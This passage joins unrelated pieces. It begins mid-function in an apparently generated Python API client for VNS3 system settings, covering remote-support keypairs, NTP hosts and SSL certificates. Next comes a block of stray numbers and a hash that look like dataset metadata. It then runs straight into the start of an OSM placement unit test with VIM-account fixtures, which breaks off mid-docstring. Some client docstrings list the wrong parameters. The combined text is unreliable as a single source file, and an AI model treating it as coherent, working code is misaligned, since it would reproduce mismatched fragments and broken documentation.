:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = ["encrypted_passphrase"] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} for param in [p for p in request_params if local_var_params.get(p) is not None]: body_params[param] = local_var_params[param] # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # HTTP header `Content-Type` header_params["Content-Type"] = api_client.select_header_content_type( # noqa: E501 ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support/keypair", "POST", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def delete_remote_support_keypair(api_client, **kwargs): # noqa: E501 """Delete Remote Support Keypair # noqa: E501 Deleting remote support keypair with revoke access # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.delete_remote_support_keypair("asdfasd", async_req=True) :param VNS3Client api_client: (required) :param encrypted_passphrase str: Encrypted passphrase string :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. 
:param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support/keypair", "DELETE", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_system_status(api_client, **kwargs): # noqa: E501 """Get System status # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_system_status(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/status", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_credential_types(api_client, **kwargs): # noqa: E501 """Get system credential types # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_credential_types(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/credential_types", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_credential_type_details(api_client, code, **kwargs): # noqa: E501 """Get credential type details # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_credential_type_details(code, async_req=True) :param VNS3Client api_client: (required) :param code str: Credential type code (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {"code": code} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/credential_types/{code}", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_system_ntp_hosts(api_client, **kwargs): # noqa: E501 """Get NTP hosts for system # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_system_ntp_hosts(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ntp_hosts", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def post_add_ntp_host(api_client, host=None, **kwargs): # noqa: E501 """Add new NTP host to system # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.post_add_ntp_host(host, async_req=True) :param VNS3Client api_client: (required) :param host str: New NTP hostname (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = ["host"] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} for param in [p for p in request_params if local_var_params.get(p) is not None]: body_params[param] = local_var_params[param] # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # HTTP header `Content-Type` header_params["Content-Type"] = api_client.select_header_content_type( # noqa: E501 ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ntp_hosts", "POST", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def delete_ntp_host(api_client, host_id, **kwargs): # noqa: E501 """Remote NTP host # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.delete_ntp_host(host_id, async_req=True) :param VNS3Client api_client: (required) :param host_id int: Index of NTP host in list (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {"host_id": host_id} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ntp_hosts/{host_id}", "DELETE", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def delete_ssl_install(api_client, **kwargs): # noqa: E501 """Uninstall SSL # noqa: E501 Delete SSL certs and remove from HTTP endpoints # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.delete_ssl_install(host_id, async_req=True) :param VNS3Client api_client: (required) :param host_id int: Index of NTP host in list (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ssl", "DELETE", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_ssl_install_status(api_client, uuid, **kwargs): # noqa: E501 """Get SSL install Job status (DEPRECATED) # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_ssl_install_status(job_id, async_req=True) :param VNS3Client api_client: (required) :param uuid str: Job ID for SSL installation :param host_id int: Index of NTP host in list (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {"uuid": uuid} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ssl/install/{uuid}", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def put_upload_ssl_certs(api_client, cert=None, key=None, **kwargs): # noqa: E501 """Upload new SSL key/cert pair # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.put_upload_ssl_certs(c, k, async_req=True) :param VNS3Client api_client: (required) :param cert str: New SSL cert (required) :param key str: New SSL key (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = ["cert", "key"] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} for param in [p for p in request_params if local_var_params.get(p) is not None]: body_params[param] = local_var_params[param] # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # HTTP header `Content-Type` header_params["Content-Type"] = api_client.select_header_content_type( # noqa: E501 ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ssl/keypair", "PUT", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def put_install_ssl_certs(api_client, **kwargs): # noqa: E501 """Install SSL key/cert pair # noqa: E501 Assumes SSL cert/key have already been uploaded # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.put_install_ssl_certs(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. 
It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ssl/install", "PUT", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_job_status(api_client, uuid, **kwargs): # noqa: E501 """Get System Job status # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_job_status(job_id, async_req=True) :param VNS3Client api_client: (required) :param uuid str: Job ID for SSL installation :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {"uuid": uuid} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/jobs/{uuid}", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) class SystemApiRouter(VersionRouter): """System configuration such as SSL, NTP hosts and remote support""" function_library = { "get_remote_support_details": {"2.1.1-2.5.4": get_remote_support_details}, "put_remote_support": {"2.1.1-2.5.4": put_remote_support}, "get_remote_support_keypair_details": { "2.1.1-2.5.4": get_remote_support_keypair_details }, "post_generate_remote_support_keypair": { "2.1.1-2.5.4": post_generate_remote_support_keypair }, "delete_remote_support_keypair": {"2.1.1-2.5.4": delete_remote_support_keypair}, "get_system_status": {"2.1.1-2.5.4": get_system_status}, "get_credential_types": {"2.1.1-2.5.4": get_credential_types}, "get_credential_type_details": {"2.1.1-2.5.4": get_credential_type_details}, "get_system_ntp_hosts": {"2.1.1-2.5.4": get_system_ntp_hosts}, "post_add_ntp_host": {"2.1.1-2.5.4": post_add_ntp_host}, "delete_ntp_host": {"2.1.1-2.5.4": delete_ntp_host}, "delete_ssl_install": {"2.1.1-2.5.4": delete_ssl_install}, "get_ssl_install_status": {"2.1.1-2.5.4": get_ssl_install_status}, 
"put_upload_ssl_certs": {"2.1.1-2.5.4": put_upload_ssl_certs}, "put_install_ssl_certs": {"2.1.1-2.5.4": put_install_ssl_certs}, "get_job_status": {"2.1.1-2.5.4": get_job_status}, }
33.786477
135
0.636639
4,424
37,976
5.169304
0.046338
0.041978
0.053872
0.050549
0.926582
0.911715
0.907998
0.903406
0.894267
0.877432
0
0.017028
0.277833
37,976
1,123
136
33.816563
0.816846
0.43143
0
0.835069
0
0
0.142682
0.038726
0
0
0
0
0
1
0.027778
false
0.003472
0.005208
0
0.064236
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73cbac45614dde4257332a1ed9fbbf3853ccfac3
49,530
py
Python
osm_pla/test/test_nsPlacementDataFactory.py
TCSOSM-20/PLA
de4f7820a050a7ed18aa93a298c5a59e379e752b
[ "Apache-2.0" ]
null
null
null
osm_pla/test/test_nsPlacementDataFactory.py
TCSOSM-20/PLA
de4f7820a050a7ed18aa93a298c5a59e379e752b
[ "Apache-2.0" ]
null
null
null
osm_pla/test/test_nsPlacementDataFactory.py
TCSOSM-20/PLA
de4f7820a050a7ed18aa93a298c5a59e379e752b
[ "Apache-2.0" ]
null
null
null
# Copyright 2020 ArctosLabs Scandinavia AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import os import unittest from collections import Counter from pathlib import Path from unittest import TestCase, mock from unittest.mock import call import yaml from osm_pla.placement.mznplacement import NsPlacementDataFactory class TestNsPlacementDataFactory(TestCase): vim_accounts = [{"vim_password": "FxtnynxBCnouzAT4Hkerhg==", "config": {}, "_admin": {"modified": 1564579854.0480285, "created": 1564579854.0480285, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "6beb4e2e-b397-11e9-a7a3-02420aff0008", "RO": "6bcfc3fc-b397-11e9-a7a3-02420aff0008"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "name": "OpenStack1", "vim_type": "openstack", "_id": "92b056a7-38f5-438d-b8ee-3f93b3531f87", "schema_version": "1.1", "vim_user": "admin", "vim_url": "http://10.234.12.47:5000/v3", "vim_tenant_name": "admin"}, {"config": {}, "vim_tenant_name": "osm_demo", "schema_version": "1.1", "name": "OpenStack2", "vim_password": "gK5v4Gh2Pl41o6Skwp6RCw==", "vim_type": "openstack", "_admin": {"modified": 1567148372.2490237, "created": 1567148372.2490237, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "b7fb0034-caf3-11e9-9388-02420aff000a", "RO": "b7f129ce-caf3-11e9-9388-02420aff000a"}, "projects_write": 
["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.44:5000/v3", "_id": "6618d412-d7fc-4eb0-a6f8-d2c258e0e900"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack3", "vim_password": "1R2FoMQnaL6rNSosoRP2hw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599746.689582, "created": 1567599746.689582, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "a8161f54-cf0e-11e9-9388-02420aff000a", "RO": "a80b6280-cf0e-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.46:5000/v3", "_id": "331ffdec-44a8-4707-94a1-af7a292d9735"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack4", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.43:5000/v3", "_id": "eda92f47-29b9-4007-9709-c1833dbfbe31"}] vim_accounts_fewer_vims = [{"vim_password": "FxtnynxBCnouzAT4Hkerhg==", "config": {}, "_admin": {"modified": 1564579854.0480285, "created": 1564579854.0480285, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "6beb4e2e-b397-11e9-a7a3-02420aff0008", "RO": "6bcfc3fc-b397-11e9-a7a3-02420aff0008"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "name": "OpenStack1", "vim_type": "openstack", "_id": 
"92b056a7-38f5-438d-b8ee-3f93b3531f87", "schema_version": "1.1", "vim_user": "admin", "vim_url": "http://10.234.12.47:5000/v3", "vim_tenant_name": "admin"}, {"config": {}, "vim_tenant_name": "osm_demo", "schema_version": "1.1", "name": "OpenStack2", "vim_password": "gK5v4Gh2Pl41o6Skwp6RCw==", "vim_type": "openstack", "_admin": {"modified": 1567148372.2490237, "created": 1567148372.2490237, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "b7fb0034-caf3-11e9-9388-02420aff000a", "RO": "b7f129ce-caf3-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.44:5000/v3", "_id": "6618d412-d7fc-4eb0-a6f8-d2c258e0e900"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack4", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.43:5000/v3", "_id": "eda92f47-29b9-4007-9709-c1833dbfbe31"}] vim_accounts_more_vims = [{"vim_password": "FxtnynxBCnouzAT4Hkerhg==", "config": {}, "_admin": {"modified": 1564579854.0480285, "created": 1564579854.0480285, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "6beb4e2e-b397-11e9-a7a3-02420aff0008", "RO": "6bcfc3fc-b397-11e9-a7a3-02420aff0008"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "name": "OpenStack1", "vim_type": "openstack", "_id": "92b056a7-38f5-438d-b8ee-3f93b3531f87", "schema_version": 
"1.1", "vim_user": "admin", "vim_url": "http://10.234.12.47:5000/v3", "vim_tenant_name": "admin"}, {"config": {}, "vim_tenant_name": "osm_demo", "schema_version": "1.1", "name": "OpenStack2", "vim_password": "gK5v4Gh2Pl41o6Skwp6RCw==", "vim_type": "openstack", "_admin": {"modified": 1567148372.2490237, "created": 1567148372.2490237, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "b7fb0034-caf3-11e9-9388-02420aff000a", "RO": "b7f129ce-caf3-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.44:5000/v3", "_id": "6618d412-d7fc-4eb0-a6f8-d2c258e0e900"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack4", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.43:5000/v3", "_id": "eda92f47-29b9-4007-9709-c1833dbfbe31"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack3", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.46:5000/v3", "_id": 
"eda92f47-29b9-4007-9709-c1833dbfbe31"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack5", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://1.1.1.1:5000/v3", "_id": "ffffffff-29b9-4007-9709-c1833dbfbe31"}] def _produce_ut_vim_accounts_info(self, vim_accounts): """ FIXME temporary, we will need more control over vim_urls and _id for test purpose - make a generator :return: vim_url and _id as dict, i.e. extract these from vim_accounts data """ return {_['name']: _['_id'] for _ in vim_accounts} def _adjust_path(self, file): """In case we are not running from test directory, then assume we are in top level directory (e.g. running from tox) and adjust file path accordingly""" path_component = '/osm_pla/test/' real_path = os.path.realpath(file) if path_component not in real_path: return os.path.dirname(real_path) + path_component + os.path.basename(real_path) else: return real_path def _populate_pil_info(self, file): """ Note str(Path()) is a 3.5 thing """ with open(str(Path(self._adjust_path(file)))) as pp_fd: test_data = yaml.safe_load_all(pp_fd) return next(test_data) def _get_ut_nsd_from_file(self, nsd_file_name): """ creates the structure representing the nsd. IMPORTANT NOTE: If using .yaml files from the NS packages for the unit tests (which we do), then the files must be modified with respect to the way booleans are processed at on-boarding in OSM. 
